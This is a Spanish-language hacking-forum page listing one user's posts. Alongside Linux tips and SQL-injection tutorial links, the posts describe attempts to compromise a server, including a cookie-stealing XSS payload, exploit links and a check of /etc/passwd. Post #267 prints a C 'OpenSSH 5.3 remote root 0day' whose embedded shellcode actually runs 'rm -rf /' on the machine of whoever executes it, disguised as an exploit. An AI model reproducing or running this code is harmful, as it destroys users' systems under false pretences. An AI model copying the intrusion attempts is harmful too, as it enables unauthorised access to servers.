Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Belial & Grimoire

#261
pues si se puede, hace unos años cuando aprendia a utilizar linux, necesitaba pasar mis archivos de una lado a otro el problema era hacerlo de windows a linux

no recuerdo el nombre del programa pero era escrito en JAVA, y podia revisar mis archivos de linux e incluso intercambiar archivos, por eso menciono que si es posible, pero bueno tendras que instalar java para que funcione el virus m imagino que se podria hacer con lenguaje C pero otro problema es que seria muy pesado como para ser un virus indetectable
#262
desafortunadamente no se si habra ejemplos aqui con joomla y SQLi, pero si apenas estas aprendiendo puedes seguir estos tutoriales y hacer pruebas con joomla despues para ver si te funciona

http://foro.elhacker.net/hacking_avanzado/gran_tutorial_sobre_inyecciones_sql_en_mysql-t247535.0.html

http://foro.elhacker.net/bugs_y_exploits/sql_injection_para_principiantes_ejemplos_en_aplicaciones_reales-t142203.0.html
#263
hola sasha

si lo que buscas es sobre seguridad web, entra en esta zona, hay tutoriales, ejemplos y temas sobre hackweb, tambien en la pagina principal www.elhacker.net hay ejemplos sobre SQLi, XSS, RFI, etc

http://foro.elhacker.net/nivel_web-b83.0/

tambien seria bueno que postearas las cosas que no vayas entendiendo en tus intentos para lograr orientarte sobre que podrias hacer, de esa manera no lo tendras facil pero tampoco te enojaras por no lograr avanzar

suerte y salu2
#264
en el pagina 13 puse una XSS que encontre en un escaneo, pero no se si no supe utilizarla o no funciona, la hice con wapiti un scanner GPL, este fue el resultado

http://xx.xxx.xxx.180/?mod=<script>alert(document.cookie)</script>&op=browse
Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
Referencias:
  http://www.cert.org/advisories/CA-2000-02.html


luego hice un scaneo con nikto y me dio el mismo resultado

+ /?mod=<script>alert(document.cookie)</script>&op=browse - 200/OK Response could be Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.


por cierto dimitrix, me podrias mandar los datos de plesk porfavor
#265
GNU/Linux / Re: Debian me odia.
9 Mayo 2012, 04:46 AM
talvez el problema es el debian que utiliza, recuerda que la version estable es antigua y por lo mismo es segura, solo quedan las cosas que ya fueron arregladas

intenta con debian mas reciente, intenta con wheeze

lo que no pusise es si te deja llegar hasta root o se detiene mientras se carga

si puedes usar tty, oprime todas las opciones son de f1 a f7, a ver i alguno te deja ver comandos

si puedes ver los comandos busca la informacion de video, y verificala con la de tu cdlive y ve si hay diferencias, talvez hay modificaciones que no hayas visto

a ver si esto te ayuda
#266
haciendo un escaneo me encontre con esto pero creo tampoco funciona  :-\

o a lo mejor es local

http://xx.xxx.xxx.180/?mod=<script>alert(document.cookie)</script>&op=browse
Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.


P.D. dimitrix me mandas los datos de plesk porfavor
#267
pues estuve probando un buen de cosas, metasploit, varios exploit, entre ellos varios que aquii utilizaron... lo bueno es que ya hubo  quien lo intento con los que poste hace tiempo y pues al parecer tampoco funcionaron e incluso e estado leyendo los bugs de esta paina para encontrar algo pero la mayoria son locales

http://xss.cx/examples/plesk-reports/xss-reflected-cross-site-scripting-cwe79-capec86-plesk-parallels-control-panel-version-20110407.20.html

tambien vi un explot para debian, OpenSSH 5.3p1 Debian
intente con este

* OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
*
*/

#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void usage(char *argv[])
{
    printf("\n\t[+] HATSUNEMIKU\n");
    printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
    printf("\t[+] By: n3xus\n");
    printf("\t[+] Greetz to hackforums.net\n");
    printf("\t[+] Keep this 0day priv8!\n");
    printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
    exit(1);
}

unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"
                           "\x6a\x2f\x89\xe7\x52"
                           "\x66\x68\x2d\x66\x89"
                           "\xe6\x52\x66\x68\x2d"
                           "\x72\x89\xe1\x52\x68"
                           "\x2f\x2f\x72\x6d\x68"
                           "\x2f\x62\x69\x6e\x89"
                           "\xe3\x52\x57\x56\x51"
                           "\x53\x89\xe1\xcd\x80";

unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
                           "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
                           "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
                           "\xdb\x40\xcd\x80";

int main(int argc, char **argv)
{

    int euid = geteuid();
    int port= 22, sock;
    char h[1000];
    struct hostent *host;
    struct sockaddr_in addr;

    if(euid != 0)
    {
        fprintf(stderr, "You need to be root to use raw sockets.\n");
        exit(1);
    }
    if(euid == 0)
    {
        fprintf(stdout, "MIKU! MIKU! MIKU!\n");
    }
    if(argc != 3)
    usage(argv);
    if(!inet_aton(h, &addr.sin_addr))
    {
        host = gethostbyname(h);
        if(!host)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            (*(void(*)())decoder)();
            exit(1);
        }
        addr.sin_addr = *(struct in_addr*)host->h_addr;
        }
        sock = socket(PF_INET, SOCK_STREAM, 0);
        addr.sin_port = htons(port);
        addr.sin_family = AF_INET;
        if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
        {
            fprintf(stderr,"[-] Exploit failed.\n");
            exit(1);
        }
        char payload[1337];
        memcpy(payload, &decoder, sizeof(decoder));
        memcpy(payload, &rootshell, sizeof(rootshell));
        send(sock, payload, strlen(payload),0);
        close(sock);
        if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            exit(1);
        }
        else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
        {
            fprintf(stdout, "[+]g0t sh3ll!\n");
            system("/bin/bash");
        }
        else
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            close(sock);
            exit(0);
        }
}


pero tampoco, espero pronto haya mas suerte

#268
al parecer plesk tiene un fallo en Agent.php, pero lamentablemente casi no se mucho sobre SQLi, tratare de buscar como lograrlo, ya que ayer fue lo primero que encontre sobre subir privilegios... pero por lo mismo que no se mucho sobre eso, lo quise dejar para despues e intentar con exploits, pero lo hare a ver que puedo encontrar

salu2
#269
que mala suerte, bueno pues mañana lo intentare de nuevo, tampoco pude con ProFTPD, metasploit no pudo

estos son los exploits con los que intente

http://securityvulns.ru/files/sm00ny-courier_imap_fsx.c

http://old.honeynet.org/papers/enemy/imapd_exploit.txt

salu2
#270
hola

pues yo estoy intentando con IMAP, al rato posteo lo que encontre aunque no creo que me funcione para tener acceso... por cierto

dimitrix, podrias verificar la direccion /etc/passwd si hubo algun cambio o algo, es que no se si logre agregar algo o solo fue un error en un exploit

tambien al rato posteo ese exploit, salu2